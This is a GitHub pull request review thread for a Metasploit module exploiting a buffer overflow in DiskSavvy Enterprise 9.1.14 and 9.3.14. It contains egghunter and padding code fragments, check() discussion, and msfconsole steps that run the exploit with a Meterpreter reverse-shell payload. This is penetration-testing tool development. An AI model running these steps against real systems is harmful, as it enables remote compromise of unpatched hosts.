Add module for DiskSavvy Enterprise (EDB-40854) #7848
Conversation
eggoptions = { | ||
checksum: true, | ||
eggtag: 'w00t' |
I'm not familiar with the eggs, but should we do a random string here to find so it's harder to detect exploitation?
That's a great idea.
Though I recommend setting badchars when you do it:
Rex::Text.rand_text_alpha(4, payload_badchars)
sploit << make_nops(8) | ||
sploit << hunter | ||
sploit << rand_text_alpha(4500) | ||
Maybe a vprint_status('sending malicious request') or something so the user knows the exploit fired? Figured vprint so it's not always there. It can be frustrating when you throw an exploit and see no feedback on the screen if you don't get a shell.
Docs look good to me.
9.3.14 is the most current version on the website. Unless you're the EDB author, was the company notified of the issue? Just want to get some background since there isn't a fixed version that I'm seeing.
if res && res.code == 200 | ||
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/ | ||
return Exploit::CheckCode::Vulnerable |
Should be Exploit::CheckCode::Appears: https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check%28%29-method#check-codes
if res && res.code == 200 | ||
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/ | ||
return Exploit::CheckCode::Vulnerable |
Can we also throw in a vprint_status("Version Detected: #{version}") in this and the elsif? If someone doesn't want to use auto target for some reason, this should tell them the version so they can set the target appropriately.
if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/ | ||
return Exploit::CheckCode::Vulnerable | ||
elsif res.body =~ /Disk Savvy Enterprise/ | ||
return Exploit::CheckCode::Detected |
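Review bot: the regex in the first branch already captures the minor version digit via (1|3), so the version print requested for both branches can be built from that match instead of a second parse; widening the capture to the whole version string (for example `v(\d+\.\d+\.\d+)`) would let the elsif branch report builds outside 9.1.14 and 9.3.14 as well, and an explicit final else returning Safe or Unknown would make the non-matching case deliberate rather than implicit.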
See above. In future versions of the software, I'd like to know what version is detected so I can go figure out the offset for myself. Nice for debugging when things go awry.
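The check() classification the reviewers above are asking for, as an added example in plain Ruby that is not the module's own code: Resp, the CHECK_* symbols and the sample bodies are constructed stand-ins for the framework's response and CheckCode objects, and it widens the thread's fixed-version regex to capture any version string so builds outside the affected list are still reported.

```ruby
# Stand-ins for Msf::Exploit::CheckCode; the real ones are framework objects.
CHECK_APPEARS  = :appears   # banner names a build on the affected list
CHECK_DETECTED = :detected  # product seen, version absent or not on the list
CHECK_SAFE     = :safe      # product banner not present
CHECK_UNKNOWN  = :unknown   # no usable HTTP response

# The two builds named in this PR.
AFFECTED_VERSIONS = %w[9.1.14 9.3.14].freeze
# Capture the whole version string rather than hard-coding (1|3).
BANNER_RE = /Disk Savvy Enterprise v(\d+\.\d+\.\d+)/

# Constructed stand-in for the framework's HTTP response (code + body).
Resp = Struct.new(:code, :body)

# Returns [check_code, version_or_nil] for a response (nil if the request failed).
def classify_banner(res)
  return [CHECK_UNKNOWN, nil] unless res && res.code == 200
  m = BANNER_RE.match(res.body)
  if m
    version = m[1]
    code = AFFECTED_VERSIONS.include?(version) ? CHECK_APPEARS : CHECK_DETECTED
    return [code, version]
  end
  return [CHECK_DETECTED, nil] if res.body.include?('Disk Savvy Enterprise')
  [CHECK_SAFE, nil]
end

# The line a vprint_status call would emit, as requested in the review.
def status_line(code, version)
  version ? "Version Detected: #{version} (#{code})" : "Check result: #{code}"
end

if __FILE__ == $0
  # Constructed sample bodies, not captured from a real server; 9.9.99 is a made-up build.
  samples = {
    'affected' => Resp.new(200, '<title>Disk Savvy Enterprise v9.3.14</title>'),
    'newer'    => Resp.new(200, '<title>Disk Savvy Enterprise v9.9.99</title>'),
    'other'    => Resp.new(200, '<title>Some Other App</title>'),
    'no_reply' => nil,
  }
  samples.each { |name, res| puts "#{name}: #{status_line(*classify_banner(res))}" }
end
```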
Worked for me.
I'll try another target once those changes get made but this is looking good so far!
I'm getting no love on 9.3.14 on XP SP3. Service is crashing, but never a shell.
Hmm, bind shell didn't work, reverse did. Any ideas on why bind is working for 9.1.14 and not 9.3.14? Wondering if it's a space issue or not.
Seems to be working now... I'll land this shortly!
Release Notes
An exploit has been added for Disk Savvy Enterprise 9.1.14 and 9.3.14, a Windows based disk space analyzer with a web interface that has a stack based buffer ov
@sgabe thanks for the submission, this looked pretty darn good from the beginning!
eggoptions = { | ||
checksum: true, | ||
eggtag: rand_text_alpha(4, payload_badchars) |
For the future: since you're using Msf::Exploit#rand_text_alpha and not Rex::Text::rand_text_alpha, you don't need to specify payload_badchars, since it's implied.
This is an MSF port of https://www.exploit-db.com/exploits/40854/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise version 9.1.14 and 9.3.14. The vulnerable application is available for download at http://www.disksavvy.com/downloads.html and https://www.exploit-db.com/apps/20058a6ebf1120bca9ac92b493cac1ff-disksavvyent_setup_v9.1.14.exe.
Verification
- Disk Savvy Enterprise service
- Disk Savvy Enterprise client application: Tools > Advanced Options > Server > Enable Web Server On Port 80 to start the web interface
- msfconsole
- use exploit/windows/http/disksavvy_get_bof
- set rhost ip
- check
- set payload windows/meterpreter/reverse_tcp
- set lhost ip
- run
Test run results below for DiskSavvy Enterprise v9.1.14 on Windows XP SP3:
Test run results below for DiskSavvy Enterprise v9.3.14 on Windows 7 SP1: